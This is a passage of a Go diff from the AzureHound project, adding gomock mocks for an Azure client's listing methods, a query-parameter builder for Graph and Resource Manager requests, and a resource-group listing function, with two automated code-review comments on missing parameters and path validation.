+func (mr *MockAzureClientMockRecorder) ListAzureADAppOwners(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADAppOwners", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADAppOwners), arg0, arg1, arg2) +} + +// ListAzureADAppRoleAssignments mocks base method. +func (m *MockAzureClient) ListAzureADAppRoleAssignments(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[azure.AppRoleAssignment] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADAppRoleAssignments", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.AppRoleAssignment]) + return ret0 +} + +// ListAzureADAppRoleAssignments indicates an expected call of ListAzureADAppRoleAssignments. +func (mr *MockAzureClientMockRecorder) ListAzureADAppRoleAssignments(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADAppRoleAssignments", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADAppRoleAssignments), arg0, arg1, arg2) +} + +// ListAzureADApps mocks base method. +func (m *MockAzureClient) ListAzureADApps(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.Application] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADApps", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Application]) + return ret0 +} + +// ListAzureADApps indicates an expected call of ListAzureADApps. +func (mr *MockAzureClientMockRecorder) ListAzureADApps(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADApps", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADApps), arg0, arg1) +} + +// ListAzureADGroupMembers mocks base method. 
+func (m *MockAzureClient) ListAzureADGroupMembers(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[json.RawMessage] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADGroupMembers", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[json.RawMessage]) + return ret0 +} + +// ListAzureADGroupMembers indicates an expected call of ListAzureADGroupMembers. +func (mr *MockAzureClientMockRecorder) ListAzureADGroupMembers(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADGroupMembers", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADGroupMembers), arg0, arg1, arg2) +} + +// ListAzureADGroupOwners mocks base method. +func (m *MockAzureClient) ListAzureADGroupOwners(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[json.RawMessage] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADGroupOwners", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[json.RawMessage]) + return ret0 +} + +// ListAzureADGroupOwners indicates an expected call of ListAzureADGroupOwners. +func (mr *MockAzureClientMockRecorder) ListAzureADGroupOwners(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADGroupOwners", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADGroupOwners), arg0, arg1, arg2) +} + +// ListAzureADGroups mocks base method. +func (m *MockAzureClient) ListAzureADGroups(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.Group] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADGroups", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Group]) + return ret0 +} + +// ListAzureADGroups indicates an expected call of ListAzureADGroups. 
+func (mr *MockAzureClientMockRecorder) ListAzureADGroups(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADGroups", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADGroups), arg0, arg1) +} + +// ListAzureADRoleAssignments mocks base method. +func (m *MockAzureClient) ListAzureADRoleAssignments(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.UnifiedRoleAssignment] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADRoleAssignments", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.UnifiedRoleAssignment]) + return ret0 +} + +// ListAzureADRoleAssignments indicates an expected call of ListAzureADRoleAssignments. +func (mr *MockAzureClientMockRecorder) ListAzureADRoleAssignments(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADRoleAssignments", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADRoleAssignments), arg0, arg1) +} + +// ListAzureADRoles mocks base method. +func (m *MockAzureClient) ListAzureADRoles(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.Role] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADRoles", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Role]) + return ret0 +} + +// ListAzureADRoles indicates an expected call of ListAzureADRoles. +func (mr *MockAzureClientMockRecorder) ListAzureADRoles(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADRoles", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADRoles), arg0, arg1) +} + +// ListAzureADServicePrincipalOwners mocks base method. 
+func (m *MockAzureClient) ListAzureADServicePrincipalOwners(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[json.RawMessage] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADServicePrincipalOwners", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[json.RawMessage]) + return ret0 +} + +// ListAzureADServicePrincipalOwners indicates an expected call of ListAzureADServicePrincipalOwners. +func (mr *MockAzureClientMockRecorder) ListAzureADServicePrincipalOwners(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADServicePrincipalOwners", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADServicePrincipalOwners), arg0, arg1, arg2) +} + +// ListAzureADServicePrincipals mocks base method. +func (m *MockAzureClient) ListAzureADServicePrincipals(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.ServicePrincipal] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADServicePrincipals", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.ServicePrincipal]) + return ret0 +} + +// ListAzureADServicePrincipals indicates an expected call of ListAzureADServicePrincipals. +func (mr *MockAzureClientMockRecorder) ListAzureADServicePrincipals(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADServicePrincipals", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADServicePrincipals), arg0, arg1) +} + +// ListAzureADTenants mocks base method. +func (m *MockAzureClient) ListAzureADTenants(arg0 context.Context, arg1 bool) <-chan client.AzureResult[azure.Tenant] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADTenants", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Tenant]) + return ret0 +} + +// ListAzureADTenants indicates an expected call of ListAzureADTenants. 
+func (mr *MockAzureClientMockRecorder) ListAzureADTenants(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADTenants", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADTenants), arg0, arg1) +} + +// ListAzureADUsers mocks base method. +func (m *MockAzureClient) ListAzureADUsers(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.User] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureADUsers", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.User]) + return ret0 +} + +// ListAzureADUsers indicates an expected call of ListAzureADUsers. +func (mr *MockAzureClientMockRecorder) ListAzureADUsers(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureADUsers", reflect.TypeOf((*MockAzureClient)(nil).ListAzureADUsers), arg0, arg1) +} + +// ListAzureAutomationAccounts mocks base method. +func (m *MockAzureClient) ListAzureAutomationAccounts(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.AutomationAccount] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureAutomationAccounts", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.AutomationAccount]) + return ret0 +} + +// ListAzureAutomationAccounts indicates an expected call of ListAzureAutomationAccounts. +func (mr *MockAzureClientMockRecorder) ListAzureAutomationAccounts(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureAutomationAccounts", reflect.TypeOf((*MockAzureClient)(nil).ListAzureAutomationAccounts), arg0, arg1) +} + +// ListAzureContainerRegistries mocks base method. 
+func (m *MockAzureClient) ListAzureContainerRegistries(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.ContainerRegistry] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureContainerRegistries", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.ContainerRegistry]) + return ret0 +} + +// ListAzureContainerRegistries indicates an expected call of ListAzureContainerRegistries. +func (mr *MockAzureClientMockRecorder) ListAzureContainerRegistries(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureContainerRegistries", reflect.TypeOf((*MockAzureClient)(nil).ListAzureContainerRegistries), arg0, arg1) +} + +// ListAzureDeviceRegisteredOwners mocks base method. +func (m *MockAzureClient) ListAzureDeviceRegisteredOwners(arg0 context.Context, arg1 string, arg2 query.GraphParams) <-chan client.AzureResult[json.RawMessage] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureDeviceRegisteredOwners", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[json.RawMessage]) + return ret0 +} + +// ListAzureDeviceRegisteredOwners indicates an expected call of ListAzureDeviceRegisteredOwners. +func (mr *MockAzureClientMockRecorder) ListAzureDeviceRegisteredOwners(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureDeviceRegisteredOwners", reflect.TypeOf((*MockAzureClient)(nil).ListAzureDeviceRegisteredOwners), arg0, arg1, arg2) +} + +// ListAzureDevices mocks base method. +func (m *MockAzureClient) ListAzureDevices(arg0 context.Context, arg1 query.GraphParams) <-chan client.AzureResult[azure.Device] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureDevices", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Device]) + return ret0 +} + +// ListAzureDevices indicates an expected call of ListAzureDevices. 
+func (mr *MockAzureClientMockRecorder) ListAzureDevices(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureDevices", reflect.TypeOf((*MockAzureClient)(nil).ListAzureDevices), arg0, arg1) +} + +// ListAzureFunctionApps mocks base method. +func (m *MockAzureClient) ListAzureFunctionApps(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.FunctionApp] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureFunctionApps", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.FunctionApp]) + return ret0 +} + +// ListAzureFunctionApps indicates an expected call of ListAzureFunctionApps. +func (mr *MockAzureClientMockRecorder) ListAzureFunctionApps(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureFunctionApps", reflect.TypeOf((*MockAzureClient)(nil).ListAzureFunctionApps), arg0, arg1) +} + +// ListAzureKeyVaults mocks base method. +func (m *MockAzureClient) ListAzureKeyVaults(arg0 context.Context, arg1 string, arg2 query.RMParams) <-chan client.AzureResult[azure.KeyVault] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureKeyVaults", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.KeyVault]) + return ret0 +} + +// ListAzureKeyVaults indicates an expected call of ListAzureKeyVaults. +func (mr *MockAzureClientMockRecorder) ListAzureKeyVaults(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureKeyVaults", reflect.TypeOf((*MockAzureClient)(nil).ListAzureKeyVaults), arg0, arg1, arg2) +} + +// ListAzureLogicApps mocks base method. 
+func (m *MockAzureClient) ListAzureLogicApps(arg0 context.Context, arg1, arg2 string, arg3 int32) <-chan client.AzureResult[azure.LogicApp] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureLogicApps", arg0, arg1, arg2, arg3) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.LogicApp]) + return ret0 +} + +// ListAzureLogicApps indicates an expected call of ListAzureLogicApps. +func (mr *MockAzureClientMockRecorder) ListAzureLogicApps(arg0, arg1, arg2, arg3 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureLogicApps", reflect.TypeOf((*MockAzureClient)(nil).ListAzureLogicApps), arg0, arg1, arg2, arg3) +} + +// ListAzureManagedClusters mocks base method. +func (m *MockAzureClient) ListAzureManagedClusters(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.ManagedCluster] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureManagedClusters", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.ManagedCluster]) + return ret0 +} + +// ListAzureManagedClusters indicates an expected call of ListAzureManagedClusters. +func (mr *MockAzureClientMockRecorder) ListAzureManagedClusters(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureManagedClusters", reflect.TypeOf((*MockAzureClient)(nil).ListAzureManagedClusters), arg0, arg1) +} + +// ListAzureManagementGroupDescendants mocks base method. +func (m *MockAzureClient) ListAzureManagementGroupDescendants(arg0 context.Context, arg1 string, arg2 int32) <-chan client.AzureResult[azure.DescendantInfo] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureManagementGroupDescendants", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.DescendantInfo]) + return ret0 +} + +// ListAzureManagementGroupDescendants indicates an expected call of ListAzureManagementGroupDescendants. 
+func (mr *MockAzureClientMockRecorder) ListAzureManagementGroupDescendants(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureManagementGroupDescendants", reflect.TypeOf((*MockAzureClient)(nil).ListAzureManagementGroupDescendants), arg0, arg1, arg2) +} + +// ListAzureManagementGroups mocks base method. +func (m *MockAzureClient) ListAzureManagementGroups(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.ManagementGroup] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureManagementGroups", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.ManagementGroup]) + return ret0 +} + +// ListAzureManagementGroups indicates an expected call of ListAzureManagementGroups. +func (mr *MockAzureClientMockRecorder) ListAzureManagementGroups(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureManagementGroups", reflect.TypeOf((*MockAzureClient)(nil).ListAzureManagementGroups), arg0, arg1) +} + +// ListAzureResourceGroups mocks base method. +func (m *MockAzureClient) ListAzureResourceGroups(arg0 context.Context, arg1 string, arg2 query.RMParams) <-chan client.AzureResult[azure.ResourceGroup] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureResourceGroups", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.ResourceGroup]) + return ret0 +} + +// ListAzureResourceGroups indicates an expected call of ListAzureResourceGroups. +func (mr *MockAzureClientMockRecorder) ListAzureResourceGroups(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureResourceGroups", reflect.TypeOf((*MockAzureClient)(nil).ListAzureResourceGroups), arg0, arg1, arg2) +} + +// ListAzureStorageAccounts mocks base method. 
+func (m *MockAzureClient) ListAzureStorageAccounts(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.StorageAccount] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureStorageAccounts", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.StorageAccount]) + return ret0 +} + +// ListAzureStorageAccounts indicates an expected call of ListAzureStorageAccounts. +func (mr *MockAzureClientMockRecorder) ListAzureStorageAccounts(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureStorageAccounts", reflect.TypeOf((*MockAzureClient)(nil).ListAzureStorageAccounts), arg0, arg1) +} + +// ListAzureStorageContainers mocks base method. +func (m *MockAzureClient) ListAzureStorageContainers(arg0 context.Context, arg1, arg2, arg3, arg4, arg5, arg6 string) <-chan client.AzureResult[azure.StorageContainer] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureStorageContainers", arg0, arg1, arg2, arg3, arg4, arg5, arg6) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.StorageContainer]) + return ret0 +} + +// ListAzureStorageContainers indicates an expected call of ListAzureStorageContainers. +func (mr *MockAzureClientMockRecorder) ListAzureStorageContainers(arg0, arg1, arg2, arg3, arg4, arg5, arg6 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureStorageContainers", reflect.TypeOf((*MockAzureClient)(nil).ListAzureStorageContainers), arg0, arg1, arg2, arg3, arg4, arg5, arg6) +} + +// ListAzureSubscriptions mocks base method. +func (m *MockAzureClient) ListAzureSubscriptions(arg0 context.Context) <-chan client.AzureResult[azure.Subscription] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureSubscriptions", arg0) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Subscription]) + return ret0 +} + +// ListAzureSubscriptions indicates an expected call of ListAzureSubscriptions. 
+func (mr *MockAzureClientMockRecorder) ListAzureSubscriptions(arg0 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureSubscriptions", reflect.TypeOf((*MockAzureClient)(nil).ListAzureSubscriptions), arg0) +} + +// ListAzureVMScaleSets mocks base method. +func (m *MockAzureClient) ListAzureVMScaleSets(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.VMScaleSet] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureVMScaleSets", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.VMScaleSet]) + return ret0 +} + +// ListAzureVMScaleSets indicates an expected call of ListAzureVMScaleSets. +func (mr *MockAzureClientMockRecorder) ListAzureVMScaleSets(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureVMScaleSets", reflect.TypeOf((*MockAzureClient)(nil).ListAzureVMScaleSets), arg0, arg1) +} + +// ListAzureVirtualMachines mocks base method. +func (m *MockAzureClient) ListAzureVirtualMachines(arg0 context.Context, arg1 string, arg2 query.RMParams) <-chan client.AzureResult[azure.VirtualMachine] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureVirtualMachines", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.VirtualMachine]) + return ret0 +} + +// ListAzureVirtualMachines indicates an expected call of ListAzureVirtualMachines. +func (mr *MockAzureClientMockRecorder) ListAzureVirtualMachines(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureVirtualMachines", reflect.TypeOf((*MockAzureClient)(nil).ListAzureVirtualMachines), arg0, arg1, arg2) +} + +// ListAzureWebApps mocks base method. 
+func (m *MockAzureClient) ListAzureWebApps(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.WebApp] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureWebApps", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.WebApp]) + return ret0 +} + +// ListAzureWebApps indicates an expected call of ListAzureWebApps. +func (mr *MockAzureClientMockRecorder) ListAzureWebApps(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureWebApps", reflect.TypeOf((*MockAzureClient)(nil).ListAzureWebApps), arg0, arg1) +} + +// ListRoleAssignmentsForResource mocks base method. +func (m *MockAzureClient) ListRoleAssignmentsForResource(arg0 context.Context, arg1, arg2, arg3 string) <-chan client.AzureResult[azure.RoleAssignment] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListRoleAssignmentsForResource", arg0, arg1, arg2, arg3) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.RoleAssignment]) + return ret0 +} + +// ListRoleAssignmentsForResource indicates an expected call of ListRoleAssignmentsForResource. +func (mr *MockAzureClientMockRecorder) ListRoleAssignmentsForResource(arg0, arg1, arg2, arg3 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListRoleAssignmentsForResource", reflect.TypeOf((*MockAzureClient)(nil).ListRoleAssignmentsForResource), arg0, arg1, arg2, arg3) +} + +// TenantInfo mocks base method. +func (m *MockAzureClient) TenantInfo() azure.Tenant { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "TenantInfo") + ret0, _ := ret[0].(azure.Tenant) + return ret0 +} + +// TenantInfo indicates an expected call of TenantInfo. +func (mr *MockAzureClientMockRecorder) TenantInfo() *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "TenantInfo", reflect.TypeOf((*MockAzureClient)(nil).TenantInfo)) +} 
diff --git a/client/query/params.go b/client/query/params.go
new file mode 100644
index 0000000..3378ab5
--- /dev/null
+++ b/client/query/params.go
@@ -0,0 +1,170 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package query
+
+import (
+ "strconv"
+ "strings"
+)
+
+const (
+ ApiVersion string = "api-version"
+ Count string = "$count"
+ Expand string = "$expand"
+ Filter string = "$filter"
+ Format string = "$format"
+ IncludeDeleted string = "$include"
+ IncludeAllTenantCategories string = "$includeAllTenantCategories"
+ MaxPageSize string = "$maxpagesize"
+ OrderBy string = "$orderby"
+ Recurse string = "$recurse"
+ Search string = "$search"
+ Select string = "$select"
+ Skip string = "$skip"
+ SkipToken string = "$skipToken"
+ StatusOnly string = "StatusOnly"
+ TenantId string = "tenantId"
+ Top string = "$top"
+)
+
+type Params interface {
+ AsMap() map[string]string
+ NeedsEventualConsistencyHeaderFlag() bool
+}
+
+type RMParams struct {
+ ApiVersion string
+ Expand string
+ Filter string
+ IncludeDeleted string
+ IncludeAllTenantCategories bool
+ MaxPageSize string
+ Recurse bool
+ SkipToken string
+ StatusOnly bool
+ TenantId string // For cross-tenant request
+ Top int32
+}
+
+func (s RMParams) NeedsEventualConsistencyHeaderFlag() bool {
+ return false
+}
+
+func (s RMParams) AsMap() map[string]string {
+ params := make(map[string]string)
+
+ if s.ApiVersion != "" {
+ params[ApiVersion] = s.ApiVersion
+ }
+
+ if s.Expand != "" {
+ params[Expand] = s.Expand
+ }
+
+ if s.Filter != "" {
+ params[Filter] = s.Filter
+ }
+
+ if s.IncludeAllTenantCategories {
+ params[IncludeAllTenantCategories] = "true"
+ }
+
+ if s.Recurse {
+ params[Recurse] = "true"
+ }
+
+ if s.SkipToken != "" {
+ params[SkipToken] = s.SkipToken
+ }
+
+ if s.StatusOnly {
+ params[StatusOnly] = "true"
+ }
+
+ if s.TenantId != "" {
+ params[TenantId] = s.TenantId
+ }
+ if s.Top > 0 {
+ params[Top] = strconv.FormatInt(int64(s.Top), 10)
+ }
+
+ return params
+}
+
+type GraphParams struct {
+ Count bool
+ Expand string
+ Format string
+ Filter string
+ OrderBy string
+ Search string
+ Select []string
+ Skip int
+ Top int32
+ SkipToken string
+}
+
+func (s GraphParams) NeedsEventualConsistencyHeaderFlag() bool {
+ return s.Count || s.Search != "" || s.OrderBy != "" || (s.Filter != "" && s.OrderBy != "") || strings.Contains(s.Filter, "endsWith")
+}
+
+func (s GraphParams) AsMap() map[string]string {
+ params := make(map[string]string)
+
+ if s.Count {
+ params[Count] = "true"
+ }
+
+ if s.Expand != "" {
+ params[Expand] = s.Expand
+ }
+
+ if s.Format != "" {
+ params[Format] = s.Format
+ }
+
+ if s.Filter != "" {
+ params[Filter] = s.Filter
+ }
+
+ if s.OrderBy != "" {
+ params[OrderBy] = s.OrderBy
+ }
+
+ if s.Search != "" {
+ params[Search] = s.Search
+ }
+
+ if len(s.Select) > 0 {
+ params[Select] = strings.Join(s.Select, ",")
+ }
+
+ if s.Skip > 0 {
+ params[Skip] = strconv.Itoa(s.Skip)
+ }
+
+ if s.SkipToken != "" {
+ params[SkipToken] = s.SkipToken
+ }
+
+ if s.Top > 0 {
+ params[Top] = strconv.FormatInt(int64(s.Top), 10)
+ }
+
+ return params
+}
diff --git a/client/resource_groups.go b/client/resource_groups.go
new file mode 100644
index 0000000..cff4182
--- /dev/null
+++ b/client/resource_groups.go
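Review bot: `RMParams.AsMap` never emits `IncludeDeleted` or `MaxPageSize`, although both are fields of the struct and have query-key constants (`$include`, `$maxpagesize`), so a caller that sets them gets a request without them and no error. If the omission is not deliberate, add `if s.IncludeDeleted != "" { params[IncludeDeleted] = s.IncludeDeleted }` and the same guard for `MaxPageSize`; if it is deliberate, a comment on the two fields should say so. In `GraphParams.NeedsEventualConsistencyHeaderFlag` the clause `(s.Filter != "" && s.OrderBy != "")` is already implied by `s.OrderBy != ""` and can be dropped. The exported types and both `AsMap` methods have no doc comments; one line each stating that zero-valued fields are left out of the map would help.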
@@ -0,0 +1,42 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureResourceGroups https://learn.microsoft.com/en-us/rest/api/resources/resource-groups/list?view=rest-resources-2021-04-01
+func (s *azureClient) ListAzureResourceGroups(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.ResourceGroup] {
+ var (
+ out = make(chan AzureResult[azure.ResourceGroup])
+ path = fmt.Sprintf("/subscriptions/%s/resourcegroups", subscriptionId)
+ )
+
+ if params.ApiVersion == "" {
+ params.ApiVersion = "2021-04-01"
+ }
+
+ go getAzureObjectList[azure.ResourceGroup](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/rest/client.go b/client/rest/client.go
new file mode 100644
index 0000000..a403190
--- /dev/null
+++ b/client/rest/client.go
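Review bot: `subscriptionId` is formatted into `path` with no validation, and the REST client in this patch builds request URLs with `s.api.ResolveReference(&url.URL{Path: path})`, which resolves dot segments, so a value containing `/` or `..` would address a different resource than the caller intended. Azure subscription IDs are GUIDs, so rejecting anything that does not parse as one before building the path would close that off; how `getAzureObjectList` uses `path` is not visible in this hunk, so confirm against it. The doc comment is only a link; it should open with `// ListAzureResourceGroups streams the resource groups of subscriptionId on the returned channel.` and mention the `2021-04-01` default applied to `params.ApiVersion`.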
